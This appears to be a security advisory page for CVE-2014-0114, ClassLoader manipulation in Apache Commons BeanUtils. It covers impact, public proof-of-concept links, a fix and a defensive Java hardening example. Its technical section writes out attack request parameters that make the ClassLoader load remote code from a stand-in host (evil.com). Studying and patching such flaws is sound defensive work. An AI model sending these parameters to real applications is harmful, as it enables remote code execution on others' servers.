CVE-2014-0114
ClassLoader Manipulation vulnerability in commons-beanutils (Maven)

What is CVE-2014-0114 About?

This vulnerability allows remote attackers to manipulate the ClassLoader in Apache Commons BeanUtils, used by Apache Struts 1.x and other products. By exploiting the lack of class property suppression, attackers can execute arbitrary code. The ease of exploitation is high, given the direct manipulation of critical system components.

Affected Software

commons-beanutils:commons-beanutils >1.8.0, <1.9.4

Technical Details

Apache Commons BeanUtils, in versions prior to 1.9.3, does not suppress the 'class' property during object population. This is particularly relevant in frameworks like Apache Struts 1.x, where a request parameter named 'class' can be passed to the 'getClass' method of an ActionForm object. An attacker can craft a request that includes parameters such as class.classLoader.URLs[0]=jar:http://evil.com/evil.jar!/ or class.classLoader.getParent().addURL(new URL('http://evil.com/')). This allows the attacker to manipulate the application's ClassLoader, loading and executing arbitrary code from a remote location and thereby achieving remote code execution.

What is the Impact of CVE-2014-0114?

Successful exploitation may allow attackers to execute arbitrary code, compromise the integrity of the application, and gain full control over the affected system.

What is the Exploitability of CVE-2014-0114?

Exploitation of this vulnerability is relatively straightforward once an attacker understands the underlying mechanism of ClassLoader manipulation. The complexity is low to moderate, requiring knowledge of how BeanUtils processes properties and how ClassLoaders work in Java. Authentication requirements depend on whether the vulnerable endpoint is accessible to unauthenticated users; if not, authentication might be a prerequisite. Privilege requirements are generally low, as the attack leverages a flaw in how the application processes user-supplied input. This is a remote vulnerability, as attackers can typically send crafted HTTP requests to the server. Special conditions include the application using vulnerable versions of Apache Commons BeanUtils and exposing endpoints that process user input via BeanUtils, such as in Apache Struts ActionForm objects. The likelihood of exploitation is significantly increased if the application directly exposes the 'class' property or properties of the ClassLoader for modification.

What are the Known Public Exploits?

PoC Author | Link | Commentary
rgielen | Link | A request parameter filter solution for Struts 1 CVE-2014-0114 based on the work of Alvaro Munoz and the HP Fortify team
aenlr | Link | PoC for CVE-2014-0114
ricedu | Link | struts1 CVE-2014-0114 classLoader manipulation vulnerability patch

What are the Available Fixes for CVE-2014-0114?

About the Fix from Resolved Security

The patch modifies the default bean introspection behavior to add SuppressPropertiesBeanIntrospector.SUPPRESS_CLASS, which prevents access to the "class" property via property APIs. This mitigates CVE-2014-0114 by blocking attackers from accessing sensitive Class object information through crafted bean property requests, closing a vector for unauthorized code execution or information disclosure.
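
The same suppression can be applied by hand and checked, as in the following added example (not Resolved Security's patch and not code from the BeanUtils project). It assumes commons-beanutils 1.9.2 or later, where SuppressPropertiesBeanIntrospector is available, plus commons-logging on the classpath; LoginForm and the parameter values are constructed for illustration.

```java
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.beanutils.BeanUtilsBean;
import org.apache.commons.beanutils.ConvertUtilsBean;
import org.apache.commons.beanutils.PropertyUtilsBean;
import org.apache.commons.beanutils.SuppressPropertiesBeanIntrospector;

public class SuppressClassExample {

    /** Constructed sample bean standing in for a form object (hypothetical). */
    public static class LoginForm {
        private String username;
        public String getUsername() { return username; }
        public void setUsername(String username) { this.username = username; }
    }

    /** True if "class" is resolvable as a bean property through the property API. */
    static boolean classVisible(PropertyUtilsBean props, Object bean) throws Exception {
        return props.getPropertyDescriptor(bean, "class") != null;
    }

    /** Builds a BeanUtilsBean whose introspection hides the "class" property. */
    static BeanUtilsBean hardened() {
        PropertyUtilsBean props = new PropertyUtilsBean();
        props.addBeanIntrospector(SuppressPropertiesBeanIntrospector.SUPPRESS_CLASS);
        props.clearDescriptors(); // drop descriptors cached before the introspector was added
        return new BeanUtilsBean(new ConvertUtilsBean(), props);
    }

    public static void main(String[] args) throws Exception {
        LoginForm form = new LoginForm();

        // Library default: depends on whether the installed release suppresses "class" itself.
        System.out.println("default exposes class:  " + classVisible(new PropertyUtilsBean(), form));

        BeanUtilsBean beanUtils = hardened();
        System.out.println("hardened exposes class: " + classVisible(beanUtils.getPropertyUtils(), form));

        // Constructed request parameters; the second name is the form quoted in Technical Details.
        Map<String, Object> params = new HashMap<>();
        params.put("username", "alice");
        params.put("class.classLoader.URLs[0]", "placeholder-value");

        // populate() skips names whose first segment cannot be resolved, so only username is set.
        beanUtils.populate(form, params);
        System.out.println("username = " + form.getUsername());
    }
}
```

Code that calls the static BeanUtils or PropertyUtils helpers uses the shared BeanUtilsBean.getInstance() rather than a private instance, so the introspector has to be added to that instance's PropertyUtilsBean at startup, before any bean is introspected.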

Available Upgrade Options

  • commons-beanutils:commons-beanutils
    • >1.8.0, <1.9.4 → Upgrade to 1.9.4

Additional Resources

What are Similar Vulnerabilities to CVE-2014-0114?

Similar Vulnerabilities: CVE-2015-0254, CVE-2010-1870, CVE-2014-4903, CVE-2019-0232, CVE-2017-5645